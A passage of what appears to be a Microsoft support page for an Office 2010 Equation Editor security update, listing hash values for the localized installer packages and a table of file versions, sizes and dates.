-kb4011618-fullfile-x64-fr-fr.exe</td><td>971999DCB683B75FF0DDD6A451295EBD7CA83149</td><td>70718FCF5C73C6E1E8EA88A00675E7D6A81CA816C117E6162B14691A710E5487</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-he-il.exe</td><td>E915952623DE5988C6000AD74D4C6942DCDE8656</td><td>04059D9E936009972E2BD58FCDDD1D68B13705E12381321092899697B0DB90F7</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-hi-in.exe</td><td>35DFB0BB09BF1C214505C023CC8876503554D943</td><td>9BB2A74642984D49E5A7CFB970A3A73AD3C48BD6399E122E92F1861EA01FED37</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-hr-hr.exe</td><td>1C155D4FB0F69FCDBBBA283B6AF1589141677127</td><td>A0A2BBF48BD30A115ED23EC4BE24AB2AB79E9813F71369B64DACCFE11B44B4D9</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-hu-hu.exe</td><td>8611B82C873D9DFC44267AB4D5BA3BFF9014004A</td><td>3EFF9198D75EA3F257C05BC10B837F7D7F741C45A7681A3BE452DAE1781F368D</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-it-it.exe</td><td>F54ED16E66AAE078255219D0FCAB3322B5FFF91A</td><td>3B14C39E77819F2F78E331495166A309182AF153195DAABEC3D322E6BE3666F5</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-ja-jp.exe</td><td>887811D8E6A90223DA819E9C5BEB121CF0D1F6B4</td><td>3399E1FEA06B872DCACD26DA0B1A34BED2A38000B38C66356DD07EA01A1C8040</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-kk-kz.exe</td><td>9C16FCBD5CD765038D201137B10895879744335E</td><td>8C6ADDE77D4D2E7431D29C6CBC155EFF51DF046C70553C853CE6E5FFE6CDE5A1</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-ko-kr.exe</td><td>B79A0DA26BB378BD3BF90FED71B0CB8BBBCDDC51</td><td>64205370DE896124FEECD638A40855D997F26851137D09FA6418C7B52055F6C8</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-lt-lt.exe</td><td>DAB97AEF6566C8C2A9CE270593ECBEE7706C8A15</td><td>9310F3814C1B06C107B50AB4FE3AA894F2CED97355FCD05B93CE9058CB050D5D</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-lv-lv.exe</td><td>E1ACCA14132110F67D85467E5013D1BC80577D89</td><td>8B12954856CFCAC46FB4A97B8759B96ED566722C0B754863ECFE15B6FCA
B395C</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-nb-no.exe</td><td>1B3E54758F9BC540DA71E8C94C7DD75FC7A9E3E5</td><td>87AE7BAF291697D02717A18A53BCA56EC971436021097A15A65E749A06D3D5DA</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-nl-nl.exe</td><td>9AC48A233453E283E00C1FE77F0E26A6A2BE7537</td><td>F0B93BE2FC004C95114104F65805026A97DD139BA0F75CA7AFC9ADC6CCF76540</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-pl-pl.exe</td><td>503EA5BDC3C91680489322461109163F100B27DB</td><td>0B2D427A2DA9A57F40208E3A0402766CDDE6EEE9019FB74E09F00A758DCE2623</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-pt-br.exe</td><td>BBD645D66CC040090C1505AA06381049B77F3055</td><td>1A77E3D22A1FA94B4B498E82A64CFC8C3AEF4962F64FD7F34E0EC375B4047ED1</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-pt-pt.exe</td><td>C2104B99090916314754B600665B79DAB1639B4B</td><td>FBB5B3D597D350DE633DA801975413EDCB0C51BC3276AAE2C6882B19EDA146F0</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-ro-ro.exe</td><td>17F63000291C55ECB9F8D266E07CA3F3B99AF91A</td><td>1E8E0BEC7CC8FD424CE87BAE084F8FB3EB6045BD95856563949D271E9891610F</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-ru-ru.exe</td><td>9F3A7056E839CF4E1137493C3514D848AD2DDC4F</td><td>94D29A0218D53257B5D00AF87F69AD05E1DCA506D4AE5D51DCD32BE59834FB71</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-sk-sk.exe</td><td>2A1EADCBF98E50175E1BE9DD7940FAB9F49A629E</td><td>554244AB6E7E10A7580F3D446E47FEAE85A4722DA530313D5ACB5BD2C0482177</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-sl-si.exe</td><td>EC6E77441662AD207FD7026602B04F85D0C32FAE</td><td>AAE96522DF0EA4B3796CC51EDBBBD42AEB804706968986C0572E61416ED8A063</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-sr-latn-cs.exe</td><td>A2CE588D1DE0DE6E2485E6572B7AAB96106E754C</td><td>630F6E5922672C5F866BCD09A61A9DAF92D987AAC3B25B0B83FC78EC701F57AF</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-sv-se.exe</td><td>25D6A6D341E8D764018D69039B01DC57D896CFD0</td><td>64C3EF670DA02EEB477
E16662B0BAB0E24054F348C7462D356CF82BEE374E736</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-th-th.exe</td><td>39342821C3D117804BC158DA4CDB92DE3CE5F4D9</td><td>9C6B8FE50A9111D3DE22E8897B1AA56498D7C68A7FFD6216BB01D0F56D81176A</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-tr-tr.exe</td><td>5F501995026722A6DB1EAAA0B83CC2A7231326CD</td><td>B3271CECA9AD212B3435BF4F97A1E292B53A91B4A7235B259F5CE53327152006</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-uk-ua.exe</td><td>30E1828C66ECAAB1CAACA8C7362B5241D639E4EE</td><td>D4F2287B04ACA3CFDD94770DBD410E1EA5FFE83684997E751A640F376860987C</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-zh-cn.exe</td><td>32ADD39324AF87A10A70F1F73BC61CDECFC7E7B4</td><td>3FFCBA2C30648ADD343E62636291B1DD341F32E5458A1AE6709EF80434AB3EE1</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-zh-tw.exe</td><td>B8DC90008177017CD34FD29B7B4F5FBC2E0EC0AA</td><td>CBEC6F0D36155BCF3D2E4AA2D857EAFA3CA323EA4A7027A956B95AA7AAC42BE0</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-ar-sa.exe</td><td>A044BC142F8D695D3164A7C0F6A4760D01DBA663</td><td>2D54409F99170157E011D1EC2339F65DDF002D16B5F37C9C3998A944B4E27C8C</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-bg-bg.exe</td><td>638823B68FD6FF2E7B5252109394A752073ED2C6</td><td>2056B8BC886717DE4B4C1A34558D41C2A8AB92BEEFD7260D1917E61CDA1EF257</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-cs-cz.exe</td><td>1E5C2C7C63D545AE6839796871F032956F723BE9</td><td>5CA9CCBEE029BFBA0DB16B3889760028C6BBD5049B22D653FCB02CE514AE1A34</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-da-dk.exe</td><td>81B3516B787CD933FE01FB11F147592952E5899D</td><td>1A0F4B28C19E5CF6C8F5F428D26FDF139F15948FBC33F365F2631F1411947243</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-de-de.exe</td><td>FC424F2D5E7C111697091F82658CAB280774F14C</td><td>CD873FC1B48E30AC3B9A6DA952C6882A963300365A44F8C8DDA4032432F5898A</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-el-gr.exe</td><td>723A17BE82B8AE7CF1B4BE1AB8CF9F7B9
46023DC</td><td>30282A49E3B390A3A325357820C1AD447A8F2E4AF430A82A50D62C1BDAD6DA4E</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-en-us.exe</td><td>0D04B56BE33B9DD3DF6149CB55E29990AD764F2D</td><td>DB9CB1C80F4AFDE5F852946D258040DB42D47D5258524D279D79A76AAAA16DAD</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-es-es.exe</td><td>68F0B54AA83256D58E617DC63EE28F564639FF14</td><td>D2EA3FE8D84596CE278BFFB6B3A8593515EB3B7941DB1334450014160628E870</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-et-ee.exe</td><td>8C368752DB8E4C7945A1B5A1ADC2F7B6EE9F76DC</td><td>2D4A0146E2B629C8F89DE965723F783D7ABB9BFFE13974E5C6947232C185D401</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-fi-fi.exe</td><td>5F6D036FE4DBB66D352F928B462D59A58B6D13B7</td><td>F1897B570D70822DFA8812454AAEFCC6770CDB73186BA6D8262C6E8A9C3E7531</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-fr-fr.exe</td><td>8501902B0F9EBE4E63FAF83F977195FB67F296CA</td><td>BB8677B0A2B73ED8A03408A7F6E14B6E714A20C64A9E08FDE3139E32CCAC7714</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-he-il.exe</td><td>650BF0033D58EC14A9A9643848EB3901BBAC0975</td><td>014305F7CBDA595C989B9355FF6845BA77C0A57FC537D79F51DB62D2F806B1F3</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-hi-in.exe</td><td>667893DF4DB4C308CEE6EBAAAF536143ADB5BD75</td><td>60D3CD80A2DFF472422C7DAEFAEBA1E89964FAD24558092919DE3B05120FE132</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-hr-hr.exe</td><td>00F6FBF5D8E292CE10B63DED8B097CE6E2B60319</td><td>A7E6CE428B0EC8B8B4A737D1EDAB3E9C553B12D4A182F635339A7DB956C33B88</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-hu-hu.exe</td><td>2E883ED146C3851A826F762C80E0195AF9095CD8</td><td>D10289C57D60B41A3D7298DC46DBAAB0B386B4EE3E056E21681B879A41E05BB6</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-it-it.exe</td><td>DD7822ED4E65AA5BEB192AD4308DFDBCD74E006E</td><td>F2720040D02298E5475CCFBD64DBC4F47E1229225ECBB52F354B1D7ADE1ABAFC</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-ja-jp.exe</td><t
d>820DD332C83F6A4536BA56549BF2CDB49EE21ED5</td><td>418DBCADD9D0102ADE59628B04BF4B2035856F92FEF5AA41B3F5F7878153FD23</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-kk-kz.exe</td><td>7E180393FEECFCEF9D6D187D667798A564B51ECE</td><td>A10245848B7236EAF1921A3FFAB700A6851AE2A5ED9C0F7D6A0027B95F5F6A36</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-ko-kr.exe</td><td>A56A1D221D97C689BC1B0B9B4B6F025E9B24058E</td><td>216A262DE0E394DE6FE8382D1F6C200F44DD65FB5A8C2A4054EDCAAA0CA12614</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-lt-lt.exe</td><td>05DCA752D2A3365A6A802FA80EC6D0003CD66203</td><td>FD498D244A2071268E97425A8157BAF8C22E7F3306131597F3EDD45868E2CD43</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-lv-lv.exe</td><td>7AF3237394C03CD41998EDA6095C252A389A13FA</td><td>9839E8BE00B8DF4B21775E0195BD310E351E463ECAAFE78B3DDD22DED3F95ACF</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-nb-no.exe</td><td>2B1251DB11B4BF548FD077070BCC07CA84FD36F1</td><td>AFE6B1AAFD5F538B274B8296A9931C2956B87C13CEA0D1BD0B8892C0864123D9</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-nl-nl.exe</td><td>9F9C17851FF19FBB54193EFF66336A55F3A5D718</td><td>11AD22183223D9BFA51621B0ABE2C3B806A6159910309F80281A655418CB634C</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-pl-pl.exe</td><td>F2EC8832FEA1EDEDED4AB8928882E422E91B81A3</td><td>011DCC759E26874093C91D7E855BDAB6152BEF21E2D99A2EE24E5D0C96313919</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-pt-br.exe</td><td>A58430F4B109B606AB27B8FE71FD84C02E11D82C</td><td>26CF8F23A3AA270B62B303AB930235DF8E908B0B15D23BC06841C559DFE89DC5</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-pt-pt.exe</td><td>C0E91D030D79A5D94AEBA078591A70D870B4701A</td><td>48C97738174AFF3A6B0A9848BF8C8906F342057B86CAC0114DD9BAB71DBD939D</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-ro-ro.exe</td><td>9842AA3C6AC426D8784F79DA5878CE1D90A1E02A</td><td>819F7D7DACF85A67250308E4A84B8424DD5164AC3B27C8B9339118746D472F5A</td></tr><tr><td>eqnedt322010-kb40
11618-fullfile-x86-ru-ru.exe</td><td>8F16BED370ED6F5DE15B28B8212DAB7D30FF2D9F</td><td>E9E86D024840CF29B8078458F5CA7564292457DD29A6732CA19B6A466A735156</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-sk-sk.exe</td><td>D1F041AB16B0C0FB9AF22374BE280B85CD91DB2F</td><td>7D90049677AAC8AC56FCEAA32B9C472DF9DC77C2C5E8D87FA0D63F43EADB24EB</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-sl-si.exe</td><td>8E23C12C534CF7A05FC050F761073734D336791E</td><td>3F17B71960E126DEE3AE4EA3957D222862A0EC1D3CD02F2D80CD2275B879B469</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-sr-latn-cs.exe</td><td>898568DF9D0EC495EB9EAC104F45FF5317F11BE7</td><td>35F59E51E88EDB025CF8FCE6884D9CF60573DB13F3090860256CD1AE1F12806F</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-sv-se.exe</td><td>CD07A211A67362D8757569173AA9BFE35D251482</td><td>CB4D8B5B4A0C9CAFA5FF727D631A2564C3329F9FCC92AE94519B17054ECF85B0</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-th-th.exe</td><td>A06860238BD978CDF96231B42FC048B052FFA4F5</td><td>C03359C71EA08361B65AD6159C2A04143F74F65A3877516E0F870A4290A37C2B</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-tr-tr.exe</td><td>E2D3BB0EAAC40FC5B41CD005064BCC24F02BD53A</td><td>37CB8D8DB5FF283B96073C557EB9D007A72547FF03FFA759536C60C758973F12</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-uk-ua.exe</td><td>188E5BA4609375CBA3202CD7DC14782096A68FD9</td><td>3F865C92075F71B433A646845A2B1D1B5C5F05F34E2A8CE1AA11E8B1EF2B3722</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-zh-cn.exe</td><td>82377EE5E7EE118CC318413BADA037AB6F119EC1</td><td>25B7D366E223F117710B29346263AA4881C3CF7C27CE7B40B2B2C2CACD40AD89</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x86-zh-tw.exe</td><td>0817B8440F8B05E62A433745703803AB1CA08C61</td><td>990D3C5BC9D1DE12480E2F418C667380B10E8150E40D08725B45C91A9B8E7693</td></tr></tbody></table><h2>File Information</h2><p>The dates and times for these files are listed in Coordinated Universal Time (UTC). 
The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><h3>For all supported x86-based versions of Office 2010</h3><table class=\"table\"><tbody><tr height=\"21\"><td height=\"21\" width=\"131\"><strong>File identifier</strong></td><td width=\"104\"><strong>File name</strong></td><td width=\"88\"><strong>File version</strong></td><td width=\"93\"><strong>File size</strong></td><td width=\"72\"><strong>Date</strong></td><td width=\"73\"><strong>Time</strong></td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1025</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1026</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1028</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1029</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1030</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td 
align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1031</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1032</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1033</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1035</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1036</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1037</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1038</td><td width=\"104\">eqnedt32.exe</td><td 
align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1040</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1041</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1042</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1043</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1044</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1045</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" 
width=\"131\">eqnedt32.exe_1046</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1048</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1049</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1050</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1051</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1053</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1054</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" 
width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1055</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1058</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1060</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1061</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1062</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1063</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1081</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" 
width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1087</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2052</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2070</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2074</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_3082</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr></tbody></table><h3>For all supported x64-based versions of Office 2010</h3><table class=\"table\"><tbody><tr height=\"21\"><td height=\"21\" width=\"131\"><strong>File identifier</strong></td><td width=\"104\"><strong>File name</strong></td><td width=\"88\"><strong>File version</strong></td><td width=\"93\"><strong>File size</strong></td><td width=\"72\"><strong>Date</strong></td><td width=\"73\"><strong>Time</strong></td></tr><tr height=\"21\"><td 
height=\"21\" width=\"131\">eqnedt32.exe_1025</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1026</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1028</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1029</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1030</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1031</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1032</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" 
